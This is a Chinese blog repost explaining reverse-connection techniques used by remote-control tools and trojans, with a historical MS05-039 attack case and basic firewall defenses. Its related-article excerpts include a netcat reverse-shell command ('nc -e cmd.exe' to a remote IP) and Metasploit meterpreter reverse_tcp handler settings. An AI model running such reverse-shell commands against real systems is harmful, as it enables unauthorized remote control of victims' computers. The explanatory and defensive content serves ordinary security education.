反弹连接技术

最新推荐文章于 2024-02-08 21:28:34 发布
最新推荐文章于 2024-02-08 21:28:34 发布
阅读量1.1k 收藏 3
点赞数 1
文章标签: 操作系统
原文链接:http://www.cnblogs.com/u0mo5/p/3973717.html
版权
应用

现在的远程控制软件很流行使用反弹连接技术。反弹技术的诞生,是为了解决传统的远程控制软件不能访问装有防火墙以及不能控制局域网内部的远程计算机。 域名反弹连接的原理很简单 编辑本段 服务端程序运行后,主动连接一个网络域名或IP地址,而本地用户通过客户端程序及时将电脑当前的IP地址及打开的端口更新到网络域名,这样服务端程序就可以成功连接到客户端,从而完成连接。因此通过反弹连接技术就可以在互联网上轻松访问到局域网里通过 NAT (透明代理)代理上网的电脑,并且可以穿过防火墙。

曾经案例

微软的MS05-039高危漏洞,就可以利用具有反弹连接功能的工具来攻击。使用编写的两个不同的批处理文件,让扫描出存在漏洞的远程计算机,自动地连接到本地计算机。然后在远程计算机上执行FTP命令,下载黑客设置的木马程序。这样就能获取了大量的“肉鸡”。

简单的防御方法

防御木马的反弹连接还是很容易的。安装网络防火墙,对需要连接到网络的程序进行有效的甄别,对那些不熟悉的程序的连接请求一律不予通过。需要注意的是,某些国产防火墙会让IE浏览器、Outlook Express等操作系统中的程序不经允许就访问网路。最好将默认的规则“通过”改为“询问”或“禁止”即可。除此以外,还可以将常用工具使用的端口和程序本身进行关联,接着将其不需要的端口屏蔽,这样可以保证电脑更加安全。

同类的正规远程办公管理软件

同样运用该技术的远程办公管理软件有德国的TeamViewer、国内的网络人(Netman)远程控制软件。

转载于:https://www.cnblogs.com/u0mo5/p/3973717.html

weixin_30341745
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹连接后门反弹连接后门
06-25
反弹连接后门反弹连接后门反弹连接后门反弹连接后门
易语言反弹连接源码-易语言
06-13
同时,反弹连接技术的应用,如在远程控制、安全检测等领域,也为我们提供了实际操作的可能性。通过阅读和分析这两份源码,开发者不仅可以学习到易语言的编程技巧,还能深入理解网络编程的复杂性和魅力。 在实践中,...
反弹连接基础
qq_45455136的博客
03-11 5056
反弹连接反弹连接适应情况常见端口监听方式建立反弹连接方式反弹连接流程 反弹连接适应情况 没有安装HTTP Server或找不到网站目录 内网,私有IP IP动态变化 6379端口不允许入方向 一句话木马被删除 常见端口监听方式 netcat:nc -lvp 7777 msf: msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.37.130 set lport 77
nc 反弹链接
diankui6178的博客
09-06 211
nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了。知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本...
反弹连接vlunhub靶机prinme1
m0_57379855的博客
09-25 470
2021-9-3 通过ip获取root权限漏洞靶机下载扫描局域网内的C段主机扫描端口获得运行的服务扫描目录获得关键信息fuzz获得正确的参数wordpress漏洞利用msfvenom生成反弹shellmsfconsole监听利用Ubuntu内核提权渗透测试的流程与技术 漏洞靶机下载 提供靶机的镜像平台链接 https://www.vulnhub.com/ 该平台有非常多的漏洞靶机镜像 今天测试的靶机链接为 https://www.vulnhub.com/entry/prime-1,358/ 点击下载,直接
反弹端口原理与HTTP隧道技术
天元喜羊羊的博客
08-20 1543
http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/ 现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网
反弹连接vulnhub靶场breach1
m0_57379855的博客
03-10 687
vulnhub靶场breach1靶场环境配置靶机网络工具准备端口扫描信息收集指纹识别CMS后台信息收集解密HTTPS流量Tomcat后台利用Linux提权 靶场环境 https://www.vulnhub.com/ 配置靶机网络 工具准备 准备一个kali burpsuite wireshark CTF编码工具 kali反弹 192.168.110.128 breach1 192.168.110.140 kali攻击 192.168.202.129 端口扫描信息收集 nmap -T4 -A -v 19
易语言-客户组件和服务器组件实现反弹连接
06-29
在IT行业中,网络通信是至关重要的一个领域,而“反弹连接”是一种特殊的网络连接方式,常见于客户端与服务器之间的通信,特别是在网络安全和渗透测试中。本文将深入探讨易语言环境下,如何利用客户组件和服务器组件...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
反弹shell是渗透测试中的关键技术,它涉及被控端主动通过网络连接到受控端,将命令行的输入输出转发到受控端。作者将反弹shell分为两个核心部分:网络连接和命令执行。 1. **本质** 反弹shell的本质是被控端与受控...
外汇技术分析.pptx
10-02
2. 支持位:支持位是价格下跌时遇到的买盘支撑区域,如果价格多次在此处反弹,说明该位置的支撑较强。 3. 阻力位:阻力位是价格上涨时遇到的卖压区域,若价格在此受阻回撤,说明该位置的阻力较强。 4. 趋势线的...
外汇技术分析培训.pptx
10-14
上升趋势线连接了相继的向上反弹的低点,位于图表下方,起到支撑作用;而下降趋势线则连接了相继的上冲高点,位于图表上方,形成阻力。趋势线的突破往往预示着趋势的反转。 支撑和阻力是市场价位的关键水平,它们...
VNC 反弹连接模式设置 for linux
Information Security Technology Organization
09-23 1807
文章作者: solariz7@yahoo.com版权所有,转载需注明作者,未经作者同意,不得用于任何形式的商业活动信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)客户端到服务器正常连接方式请参考其它资料 服务器到客户端反弹连接为 在VNC客户端 vnc-viewer设为listerning mode ,然后netstat -an 查看确保缺省5
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 386
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
反弹连接的shellcode
12-26 568
C代码 #include<sys/socket.h> //构造socket所需的库 #include<netinet/in.h> //定义sockaddr结构 int main() { char *shell[2]; //用于execv调用 int soc,remote; //文件描述符句柄 struct so...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3279
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
Mysql数据库反弹端口连接提权_MYSQL提权总结
weixin_39692045的博客
01-20 299
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit...
TCP连接反弹技术
最新发布
weixin_43049833的博客
02-08 508
总的来说,反弹shell的基础操作包括在攻击者的机器上设置一个监听端口,然后在受害者机器上使用特定的命令将标准输入输出重定向到该端口,从而实现远程控制。在反弹技术中,Netcat可以用来在攻击者的机器上监听特定端口,等待从受害者机器上发出的连接请求,一旦连接建立,就可以进行命令执行和数据传输。其次,反弹技术,也被称为反向连接反弹shell,是攻击者在被害主机上执行的命令能够通过网络送回到攻击者机器上的一种技术。在TCP/IP协议中,TCP提供数据传输过程中的连接建立、数据包排序和错误恢复等机制。
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 806
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
反弹shell无法反弹
08-13
1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值